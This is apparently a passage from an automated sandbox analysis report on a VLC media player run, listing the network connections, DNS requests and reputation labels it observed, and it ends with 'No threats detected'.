142.250.186.36:80
http://www.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2656
vlc.exe
65.108.45.53:80
mb.videolan.org
Hetzner Online GmbH
FI
malicious
2656
vlc.exe
142.250.186.174:80
images.google.com
GOOGLE
US
whitelisted
2656
vlc.exe
142.250.186.36:80
www.google.com
GOOGLE
US
whitelisted
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2112
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
20.190.160.130:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.14
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
mb.videolan.org
  • 65.108.45.53
malicious
images.google.com
  • 142.250.186.174
whitelisted
www.google.com
  • 142.250.186.36
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.160.130
  • 20.190.160.65
  • 20.190.160.64
  • 40.126.32.138
  • 20.190.160.3
  • 40.126.32.140
  • 40.126.32.76
  • 20.190.160.22
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted

Threats

No threats detected
No debug info